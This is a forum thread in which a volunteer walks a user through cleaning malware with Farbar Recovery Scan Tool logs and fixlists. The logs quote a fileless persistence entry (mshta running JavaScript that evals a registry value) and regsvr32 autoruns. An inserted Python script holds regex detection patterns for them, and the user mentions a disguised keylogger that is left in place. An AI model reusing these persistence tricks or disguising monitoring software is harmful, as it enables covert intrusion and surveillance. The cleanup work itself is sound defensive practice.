2017-02-27 05:41 - 2017-02-27 05:41 - 01129376 _____ (Google Inc.) C:\Users\User\Downloads\ChromeSetup (1).exe
2017-02-27 05:41 - 2017-02-27 05:41 - 00002346 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-02-27 05:41 - 2017-02-27 05:41 - 00002334 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2017-02-26 17:51 - 2017-02-26 17:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Easy Video Maker
2017-02-26 17:51 - 2017-02-26 17:51 - 00000000 ____D C:\Program Files (x86)\Easy Video Maker
2017-02-26 17:50 - 2017-02-26 17:50 - 47273719 _____ (Easy Video Maker ) C:\Users\User\Downloads\easyvideomaker.exe
2017-02-26 17:21 - 2017-02-26 17:21 - 47982421 _____ C:\Users\User\Downloads\ffmpeg-20170225-7e4f32f-win64-static.zip
2017-02-26 17:20 - 2017-02-26 17:21 - 118617974 _____ C:\Users\User\Downloads\Kdenlive-16.12.1-w64.zip
2017-02-24 05:35 - 2017-02-24 05:35 - 00003140 _____ C:\Users\User\Documents\cc_20170224_053527.reg
2017-02-21 22:55 - 2017-02-21 22:56 - 00000184 _____ C:\Users\User\Desktop\Facebook.url
2017-02-16 17:31 - 2017-03-09 06:15 - 00000000 ____D C:\Users\User\Desktop\Cindi
2017-02-13 07:51 - 2017-02-13 07:51 - 03752131 _____ C:\Users\User\Downloads\Welcome-to-the-Jungle-Print.pdf
2017-02-13 07:50 - 2017-02-13 07:50 - 01401603 _____ C:\Users\User\Downloads\END-YOUR-ADDICTION-pdf.pdf
2017-02-13 00:28 - 2017-02-13 00:28 - 00001384 _____ C:\Users\User\Documents\cc_20170213_002804.reg
2017-02-10 12:29 - 2017-02-10 12:29 - 00000000 ____D C:\Users\User\Documents\Apowersoft
2017-02-10 12:28 - 2017-02-10 12:29 - 00000000 ____D C:\Users\User\AppData\Roaming\Apowersoft
2017-02-10 12:28 - 2017-02-10 12:28 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apowersoft
2017-02-10 12:28 - 2017-02-10 12:28 - 00000000 ____D C:\Program Files (x86)\Apowersoft
2017-02-10 12:28 - 2017-01-02 15:01 - 00370424 _____ (Riverbed Technology, Inc.) C:\WINDOWS\system32\wpcap.dll
2017-02-10 12:28 - 2017-01-02 15:01 - 00282360 _____ (Riverbed Technology, Inc.) C:\WINDOWS\SysWOW64\wpcap.dll
2017-02-10 12:28 - 2017-01-02 15:01 - 00107768 _____ (Riverbed Technology, Inc.) C:\WINDOWS\system32\Packet.dll
2017-02-10 12:28 - 2017-01-02 15:01 - 00098040 _____ (Riverbed Technology, Inc.) C:\WINDOWS\SysWOW64\Packet.dll
2017-02-10 12:28 - 2017-01-02 15:01 - 00053299 _____ C:\WINDOWS\SysWOW64\pthreadVC.dll
2017-02-10 12:28 - 2017-01-02 15:01 - 00036600 _____ (Riverbed Technology, Inc.) C:\WINDOWS\system32\Drivers\npf.sys
2017-02-10 12:19 - 2017-02-10 12:19 - 64342824 _____ (APOWERSOFT LIMITED ) C:\Users\User\Downloads\video-download-capture.exe
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-03-09 13:07 - 2016-08-30 14:41 - 00000000 ____D C:\FRST
2017-03-09 11:59 - 2016-09-22 20:20 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-03-09 06:13 - 2017-01-23 03:51 - 00000000 ____D C:\Users\User\Desktop\mp3
2017-03-09 05:38 - 2016-09-21 00:19 - 00000000 ____D C:\Users\User\AppData\Roaming\uTorrent
2017-03-09 05:37 - 2016-07-16 03:47 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2017-03-09 05:37 - 2016-07-16 03:45 - 00000000 ____D C:\WINDOWS\INF
2017-03-09 05:34 - 2016-12-27 22:20 - 00000000 ____D C:\ProgramData\YTD Video Downloader
2017-03-08 19:05 - 2017-02-05 15:31 - 00000000 ____D C:\Users\User\AppData\Roaming\eM Client
2017-03-08 17:54 - 2016-02-21 19:56 - 02491196 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-03-08 17:50 - 2017-01-24 13:49 - 00250816 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-03-08 17:50 - 2017-01-19 16:10 - 00000000 ____D C:\ProgramData\VMware
2017-03-08 17:50 - 2016-09-22 20:44 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-03-08 17:49 - 2016-07-15 22:04 - 01048576 _____ C:\WINDOWS\system32\config\BBI
2017-03-08 17:08 - 2016-07-16 03:47 - 00000000 ___HD C:\Program Files\WindowsApps
2017-03-08 17:08 - 2016-07-16 03:47 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-03-08 15:17 - 2016-09-23 22:35 - 00000000 ____D C:\Users\User\AppData\Roaming\vlc
2017-03-08 15:16 - 2016-09-21 00:19 - 00000000 ____D C:\Users\User\AppData\LocalLow\uTorrent
2017-03-05 04:25 - 2016-11-24 19:19 - 00000000 ____D C:\Users\User\AppData\LocalLow\Mozilla
2017-03-05 04:21 - 2016-11-24 18:02 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-03-05 04:21 - 2016-09-25 18:30 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-03-05 04:21 - 2014-09-05 00:41 - 00000000 ____D C:\Users\User\AppData\LocalLow\Temp
2017-03-04 22:16 - 2016-08-16 03:07 - 00000000 ____D C:\Users\User\AppData\Local\ElevatedDiagnostics
2017-03-04 18:58 - 2016-07-16 03:47 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-03-04 18:56 - 2016-07-28 05:38 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2017-02-28 22:19 - 2016-09-23 23:40 - 00000000 ____D C:\Users\User\Desktop\Saved_files
2017-02-27 05:52 - 2016-02-21 19:53 - 00000000 ____D C:\Users\User\AppData\Local\Packages
2017-02-27 05:41 - 2016-02-26 06:39 - 00000000 ____D C:\Program Files (x86)\Google
2017-02-26 17:50 - 2016-09-23 19:03 - 00000000 ____D C:\Users\User\AppData\Local\Downloaded Installations
2017-02-23 04:08 - 2017-01-19 16:05 - 00000000 ____D C:\Users\User\AppData\Roaming\Andy
2017-02-23 03:41 - 2017-01-19 16:14 - 00000000 ____D C:\Users\User\AppData\Roaming\VMware
2017-02-22 20:40 - 2016-02-21 21:59 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-02-22 20:37 - 2016-02-21 21:59 - 138020592 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-02-21 20:11 - 2016-07-16 03:36 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-02-21 14:02 - 2016-03-29 06:28 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-02-19 11:05 - 2016-07-16 03:47 - 00000000 ____D C:\WINDOWS\system32\NDF
2017-02-18 12:04 - 2017-01-26 13:48 - 00003274 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
2017-02-18 12:04 - 2016-02-21 19:56 - 00002402 _____ C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-02-18 12:04 - 2014-03-27 05:25 - 00000000 ___RD C:\Users\User\OneDrive
2017-02-18 06:39 - 2016-09-21 22:44 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2017-02-14 19:10 - 2016-07-16 03:47 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-02-14 19:10 - 2016-07-16 03:47 - 00000000 ____D C:\WINDOWS\system32\Macromed
2017-02-11 12:54 - 2017-01-19 16:05 - 00000000 ____D C:\Users\User\Andy
2017-02-09 17:31 - 2016-09-22 20:23 - 00000000 ____D C:\ProgramData\Package Cache
2017-02-07 12:45 - 2014-08-26 01:49 - 00000458 _____ C:\Users\User\.swfinfo
2017-02-07 07:48 - 2017-01-18 13:33 - 00000000 ____D C:\Users\User\AppData\Roaming\Stellarium
 
==================== Files in the root of some directories =======
 
2016-09-04 00:09 - 2016-09-04 00:13 - 0007607 _____ () C:\Users\User\AppData\Local\resmon.resmoncfg
2016-09-23 15:56 - 2016-09-23 15:56 - 0000016 _____ () C:\ProgramData\mntemp
2016-09-23 15:56 - 2016-09-23 15:56 - 0005116 _____ () C:\ProgramData\rxsmznjf.zcp
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
LastRegBack: 2017-03-08 03:24
 
==================== End of FRST.txt ============================
 
 
Thanks in advance for any help you can give me. 
ps In case you're wondering... Yes I am running a keylogger and just renamed it Adobe Covert54 or something similar. 
 



 


#2 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:06:35 PM

Posted 09 March 2017 - 10:30 PM

Hello! Welcome to BleepingComputer Forums! :welcome:
My name is Georgi and I will be helping you with your computer problems.

Before we begin, please note the following:

  • I will be working on your malware issues; this may or may not solve other issues you have with your machine.
  • The logs can take some time to research, so please be patient with me.
  • Stay with the topic until I tell you that your system is clean. Missing symptoms does not mean that everything is okay.
  • Instructions that I give are for your system only!
  • Please do not run any tools until requested! The reason for this is so I know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.
  • Please perform all steps in the order received. If you can't understand something don't hesitate to ask.
  • Again I would like to remind you to make no further changes to your computer unless I direct you to do so. I will not help you if you do not follow my instructions.

 

 

Please attach Addition.txt.

Thanks!

 

 

Regards,

Georgi




#3 captivekangaroo


Posted 09 March 2017 - 10:36 PM

I apologize. I thought I had attached this already: Addition.txt (attached file, 48.41KB)



#4 B-boy/StyLe/


Posted 10 March 2017 - 04:31 PM

Hello,

 

 

 

Please go ahead and uninstall the following program from the Control Panel:

YTD Video Downloader 5.8.2 => see here why. You can keep it installed if you like it but keep in mind it's bundled with adware.

 

 

Do you know what this program is => SWU? C:\Program Files\devnullnull2017\SWU\swu.exe => never heard of it

 

 

I'll try to avoid deleting your keylogger:
 

C:\ProgramData\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe => Your Keylogger

 

C:\ProgramData\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe => Your Keylogger

 

C:\ProgramData\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ime32.dll => Your Keylogger

HKLM\...\Policies\Explorer\Run: [localSPM] => C:\WINDOWS\runkey.exe [424592 2016-08-05] () => Your Keylogger

HKLM-x32\...\Run: [kbdsprt] => [X] => Your Keylogger (if the file is renamed the run value is no longer valid).

 

 

 

Let's remove the baddies

 

 

 

Please download the following file => fixlist.txt (attached file, 2.3KB) and save it to the Desktop.
NOTE. It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

Run FRST and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.

This script was written specifically for you, for use on that particular machine.

 

Let me know how things are after the fix above.

 

 

Regards,

Georgi




#5 captivekangaroo


Posted 11 March 2017 - 01:58 PM

Georgi, 

Thanks so much for taking the time to help me with my computer problems. 

 

In answer to your question, "Do you know what this program is => SWU? C:\Program Files\devnullnull2017\SWU\swu.exe => never heard of it", I came up with this:

 

swu.exe is a Sweex WiFi Utility belonging to Sweex Europe BV. Sweex WiFi Utility is a Windows application. It was created for Windows by Sweex. Please follow http://www.sweex.com if you want to read more on Sweex WiFi Utility on Sweex's website. Sweex WiFi Utility is typically set up in the C:\Program Files\Sweex folder, but this location may vary a lot depending on the user's choice while installing the application. You can uninstall Sweex WiFi Utility by clicking on the Start menu of Windows and pasting the command line RunDll32 C:\PROGRA~1\COMMON~1\INSTAL~1\PROFES~1\RunTime\11\50\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{356D234E-3AD4-4495-B5CD-9AC1C05A19C8}\setup.exe" -l0x9 -removeonly. Keep in mind that you might receive a notification for administrator rights. The application's main executable file is labeled swu.exe and occupies 584.00 KB (598016 bytes).

Sweex WiFi Utility is comprised of the following executables which occupy 3.68 MB (3859360 bytes) on disk:

 

  • Autoswitch.exe (28.00 KB)
  • CleanOldInstall.exe (144.00 KB)
  • KILLW16.EXE (7.41 KB)
  • SMSetup.exe (52.00 KB)
  • swu.exe (584.00 KB)
  • AegisI2.exe (124.00 KB)
  • swu.exe (584.00 KB)
  • devcon.exe (54.50 KB)
  • setacl.exe (160.00 KB)
  • WinX64.exe (28.50 KB)
  • WRLSetup.exe (36.00 KB) "

 

As for the "devnullnull2017" I came up with this:

http://www.computerworld.com/article/3025497/linux/sending-data-into-the-void-with-dev-null.html. 

 

I have no clue if this helps or not. 

 

And as for taking your suggestion and deleting the program YTD Video Downloader 5.8.2, I was at first hesitant because I use it so much. When I initially installed it, I was careful to untick the options of installing the bundled software that was offered with it. But better safe than sorry so I uninstalled it. 

 

I ran the FRST.exe twice. This was because you said for the fix to be successful, the FRST64.exe and fixlist.txt must be in the same location. Well my FRST64.exe was located in the Downloads folder so I saved the fixlist.exe there also. When I initially ran the scan it was taking several hours so I thought I had made a mistake and stopped the scan (which generated the first Fixlog.txt *see below). I then moved both the FRST64.exe and fixlist.txt to the Desktop and ran the FRST64.exe from there. (which generated the second Fixlog.txt *see below). I hope I didn't mess anything up.

 

#1 Fixlog.txt:

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 08-03-2017

Ran by User (10-03-2017 13:45:31) Run:1
Running from C:\Users\User\Downloads
Loaded Profiles: User (Available Profiles: User)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
start
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\...\Run: [YclnPack] => regsvr32.exe C:\Users\User\AppData\Local\YclnPack\gdiMouseG32.dll <===== ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\...\Run: [Ondbics] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\User\AppData\Local\YgfPack\gdiMouseG32.dll <===== ATTENTION
C:\Users\User\AppData\Local\YclnPack
C:\Users\User\AppData\Local\YgfPack
HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\...\Run: [YclnPack] => regsvr32.exe C:\Users\User\AppData\Local\YclnPack\gdiMouseG32.dll <===== ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\...\Run: [Ondbics] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\User\AppData\Local\YgfPack\gdiMouseG32.dll <===== ATTENTION
ShellIconOverlayIdentifiers: [0TheftProtectionDll] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} =>  -> No File
Folder: C:\ProgramData\Microsoft\Performance
C:\ProgramData\Microsoft\Performance
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
CHR Extension: (Chrome Media Router) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-02-03]
Folder: C:\Users\User\AppData\Local\e97791
C:\Users\User\AppData\Local\e97791
Folder: C:\Users\User\AppData\Local\SysHashTable
Folder: C:\ProgramData\mntemp
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\Software\Classes\exefile:  <===== ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\Software\Classes\.exe: exefile =>  <===== ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\Software\Classes\f27e02: "C:\WINDOWS\system32\mshta.exe" "javascript:hIz78KEX="LW";K7g=new ActiveXObject("WScript.Shell");EmG9IXS="Lqef";M86Tas=K7g.RegRead("HKCU\\software\\cvdsripecv\\mcnhngw");NV04AmW="3fOS9A";eval(M86Tas);n6iUI="gGU";" <===== ATTENTION
Reg: Reg Query "HKCU\software\cvdsripecv"
end
*****************
 
Restore point was successfully created.
Processes closed successfully.
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\Software\Microsoft\Windows\CurrentVersion\Run\\YclnPack => value not found.
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\Software\Microsoft\Windows\CurrentVersion\Run\\Ondbics => value not found.
C:\Users\User\AppData\Local\YclnPack => moved successfully
C:\Users\User\AppData\Local\YgfPack => moved successfully
 

#2 Fixlog.txt:

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 08-03-2017

Ran by User (10-03-2017 17:38:03) Run:2
Running from C:\Users\User\Desktop
Loaded Profiles: User (Available Profiles: User)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
start
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\...\Run: [YclnPack] => regsvr32.exe C:\Users\User\AppData\Local\YclnPack\gdiMouseG32.dll <===== ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\...\Run: [Ondbics] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\User\AppData\Local\YgfPack\gdiMouseG32.dll <===== ATTENTION
C:\Users\User\AppData\Local\YclnPack
C:\Users\User\AppData\Local\YgfPack
HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\...\Run: [YclnPack] => regsvr32.exe C:\Users\User\AppData\Local\YclnPack\gdiMouseG32.dll <===== ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\...\Run: [Ondbics] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\User\AppData\Local\YgfPack\gdiMouseG32.dll <===== ATTENTION
ShellIconOverlayIdentifiers: [0TheftProtectionDll] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} =>  -> No File
Folder: C:\ProgramData\Microsoft\Performance
C:\ProgramData\Microsoft\Performance
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
CHR Extension: (Chrome Media Router) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-02-03]
Folder: C:\Users\User\AppData\Local\e97791
C:\Users\User\AppData\Local\e97791
Folder: C:\Users\User\AppData\Local\SysHashTable
Folder: C:\ProgramData\mntemp
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\Software\Classes\exefile:  <===== ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\Software\Classes\.exe: exefile =>  <===== ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\Software\Classes\f27e02: "C:\WINDOWS\system32\mshta.exe" "javascript:hIz78KEX="LW";K7g=new ActiveXObject("WScript.Shell");EmG9IXS="Lqef";M86Tas=K7g.RegRead("HKCU\\software\\cvdsripecv\\mcnhngw");NV04AmW="3fOS9A";eval(M86Tas);n6iUI="gGU";" <===== ATTENTION
Reg: Reg Query "HKCU\software\cvdsripecv"
end
*****************
 
Restore point was successfully created.
Processes closed successfully.
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\Software\Microsoft\Windows\CurrentVersion\Run\\YclnPack => value not found.
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\Software\Microsoft\Windows\CurrentVersion\Run\\Ondbics => value not found.
"C:\Users\User\AppData\Local\YclnPack" => not found.
"C:\Users\User\AppData\Local\YgfPack" => not found.
 
Again, thank you for your valuable help and as soon as I'm able I will donate. Times are tough right now. But rest assured I will not forget.
 
Sincerely,
Captivekangaroo


#6 B-boy/StyLe/


Posted 11 March 2017 - 02:33 PM

Hello Captivekangaroo,

 

 

Thank you for the clarification regarding swu.exe. It is a part of your WiFi configuration Utility and it seems trustworthy.

 

However we should run the fix again since I made a mistake by including a temp hive loaded by Malwarebytes and that's why the fix was not successful. (I am sorry for the inconvenience).

 

And don't worry about donations. Your gratitude is enough to make me smile. :)

 

Please download the following file => fixlist.txt (attached file, 1.47KB) and save it to the Desktop.
NOTE. It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

Run FRST and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.

This script was written specifically for you, for use on that particular machine.

 

Let me know how things are after the fix above.

 

 

Also please run a new scan with FRST and attach the results in your next reply.

Thanks!

 

 

Regards,

Georgi
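An added example, not part of the original thread and not FRST's own code: a small triage pass over FRST-style lines that flags the patterns seen in the fixlist above (a Run value launching regsvr32 on a DLL under AppData, an mshta inline script that reads and evals a registry value, a per-user .exe class override) and marks entries that point at a temporarily loaded hive, the cause of the failed fix described in post #6. The rule names and the `triage` function are hypothetical; the sample lines are adapted from the fixlist content in this thread, with the mshta value shortened.

```python
import re

# Constructed sample: lines adapted from the fixlist content quoted in this
# thread (the mshta value is shortened; SID and GUID are as shown in the log).
SAMPLE_LINES = [
    r'HKU\S-1-5-21-149886074-3337202059-3120734808-1003\...\Run: [YclnPack] => regsvr32.exe C:\Users\User\AppData\Local\YclnPack\gdiMouseG32.dll <===== ATTENTION',
    r'HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\...\Run: [Ondbics] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\User\AppData\Local\YgfPack\gdiMouseG32.dll <===== ATTENTION',
    r'HKU\S-1-5-21-149886074-3337202059-3120734808-1003\Software\Classes\.exe: exefile =>  <===== ATTENTION',
    r'HKU\S-1-5-21-149886074-3337202059-3120734808-1003\Software\Classes\f27e02: "C:\WINDOWS\system32\mshta.exe" "javascript:K7g=new ActiveXObject("WScript.Shell");M86Tas=K7g.RegRead("HKCU\\software\\cvdsripecv\\mcnhngw");eval(M86Tas);" <===== ATTENTION',
    # Matched by no rule below (the thread identifies it as the user's own software).
    r'HKLM\...\Policies\Explorer\Run: [localSPM] => C:\WINDOWS\runkey.exe [424592 2016-08-05] ()',
    r'C:\Users\User\AppData\Local\YclnPack',
]

GUID = r'\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}'

# A user hive path whose SID is followed by "-{GUID}-<digits>": a copy of the
# hive loaded temporarily by another tool, not the live HKU\<SID> hive.
TEMP_HIVE = re.compile(r'^HKU\\(S-1-5-21(?:-\d+)+)-' + GUID + r'-\d+\\')

# FRST prints autorun values as "...\Run: [ValueName] => command".
RUN_VALUE = re.compile(r'\\Run: \[([^\]]+)\]')

# regsvr32 registering a DLL that lives in a user-writable AppData folder.
REGSVR32_USER_DLL = re.compile(
    r'regsvr32(?:\.exe)?"?\s+"?([A-Za-z]:\\Users\\[^"<>|]*?\\AppData\\[^"<>|]*?\.dll)',
    re.IGNORECASE)

# mshta started with an inline script URL instead of an .hta file.
MSHTA_SCRIPT = re.compile(r'mshta(?:\.exe)?"?\s+"?(?:javascript|vbscript):',
                          re.IGNORECASE)

# Per-user override of how .exe files are opened.
EXE_CLASS = re.compile(r'^HKU\\[^\\]+\\Software\\Classes\\(\.exe|exefile):',
                       re.IGNORECASE)


def triage(lines):
    """Return (line_index, rule_id, detail) tuples for every rule that fires."""
    findings = []
    for idx, line in enumerate(lines):
        hive = TEMP_HIVE.match(line)
        if hive:
            # Report the base SID so the entry can be re-targeted at the live hive.
            findings.append((idx, 'temp-hive', hive.group(1)))

        run = RUN_VALUE.search(line)
        dll = REGSVR32_USER_DLL.search(line)
        if run and dll:
            findings.append((idx, 'run-regsvr32-userdll',
                             f'{run.group(1)} -> {dll.group(1)}'))

        if MSHTA_SCRIPT.search(line):
            # Script body stored in the registry and evaluated at launch:
            # nothing on disk for a file scanner to find.
            staged = 'RegRead' in line and 'eval(' in line
            findings.append((idx, 'mshta-inline-script',
                             'RegRead+eval' if staged else 'inline script'))

        cls = EXE_CLASS.match(line)
        if cls:
            findings.append((idx, 'exe-class-override', cls.group(1)))
    return findings


if __name__ == '__main__':
    for idx, rule, detail in triage(SAMPLE_LINES):
        print(f'line {idx}: {rule}: {detail}')
```
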




#7 captivekangaroo


Posted 12 March 2017 - 09:09 PM

(3 of 3 parts)
 
========= Reg Query "HKCU\software\cvdsripecv" =========
 
 
HKEY_CURRENT_USER\software\cvdsripecv
 
 
 
========= End of Reg: =========
 
 
 
The system needed a reboot.
 
==== End of Fixlog 15:00:39 ====


#8 B-boy/StyLe/


Posted 13 March 2017 - 09:42 AM

Hi,

 

This is not the full log. Can you please attach it to your next reply or if it is too big/long please upload it here and post back the link in your next reply.

 

 

Thanks!

 

 

Regards,

Georgi




#9 captivekangaroo


Posted 14 March 2017 - 08:52 AM

Here is the link because I couldn't send it all at once. It just wouldn't work.  :smash:  :

 

https://transfer.pcloud.com/download.html?code=5ZCYy6Zf2jXP9WdIxYZtPXpZbo1wd7Ij628YvNUOXY5XhLemh1y7



#10 B-boy/StyLe/


Posted 14 March 2017 - 09:29 AM

Hi,

 

 

I think we nailed it down. There are only a few leftovers to be deleted:

 

 

Please download the following file => fixlist.txt (attached file, 314 bytes) and save it to the Desktop.
NOTE. It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

Run FRST and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.

This script was written specifically for you, for use on that particular machine.

 

Let me know how things are after the fix above. :)

 

 

Regards,
Georgi




#11 captivekangaroo


Posted 14 March 2017 - 10:31 AM

My computer is running in tip-top form now, thanks to bleepingcomputer but especially to you, Georgi. And I will one day, be able to donate to show my appreciation.

No one can live on gratitude alone!

 

https://imagizer.imageshack.us/v2/209x240q90/924/nfX1Iu.jpg

 

 

Per your request, here is what I hope to be the final Fixlog.text:

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 13-03-2017
Ran by User (14-03-2017 07:38:06) Run:4
Running from C:\Users\User\Desktop
Loaded Profiles: User (Available Profiles: User)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
start
CreateRestorePoint:
CloseProcesses:
C:\Users\User\AppData\Local\SysHashTable
DeleteKey: HKCU\software\cvdsripecv
FF Extension: (Save Search Command) - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\m59rkng9.default\Extensions\{6523E848-E572-DC38-99AA-65F1138AB5BD} [2017-03-08] [not signed]
end
*****************
 
Restore point was successfully created.
Processes closed successfully.
C:\Users\User\AppData\Local\SysHashTable => moved successfully
HKCU\software\cvdsripecv => key removed successfully
C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\m59rkng9.default\Extensions\{6523E848-E572-DC38-99AA-65F1138AB5BD} => moved successfully
 
 
The system needed a reboot.
 
==== End of Fixlog 07:39:52 ====
 
Cheers Georgi!

Edited by captivekangaroo, 14 March 2017 - 10:41 AM.


#12 B-boy/StyLe/


Posted 14 March 2017 - 12:11 PM

Hi,

 

 

Although we managed to clean the malicious entries from the system, I'd recommend proceeding with the steps below just to be on the safe side. :)

Here is the last set of steps just to make sure nothing is lurking in the dark corners.


STEP 1
 
 
Please download Malwarebytes Anti-Malware to your desktop.

  • Double-click mb3-setup-consumer-3.0.6.1469.exe and follow the prompts to install the program.
  • At the end, be sure a checkmark is placed next to the following:
    • Launch Malwarebytes Anti-Malware
    • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
  • Click Finish.
  • On the Dashboard, click the 'Update Now >>' link
  • After the update completes, click the 'Scan Now >>' button.
  • Or, on the Dashboard, click the Scan Now >> button.
  • If an update is available, click the Update Now button.
  • A Threat Scan will begin.
  • When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.
  • In most cases, a restart will be required.
  • Wait for the prompt to restart the computer to appear, then click on Yes.

How to get logs: (Export log to save as txt)

  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double click on the scan log which shows the Date and time of the scan just performed.
  • Click 'Export'.
  • Click 'Text file (*.txt)'
  • In the Save File dialog box which appears, click on Desktop.
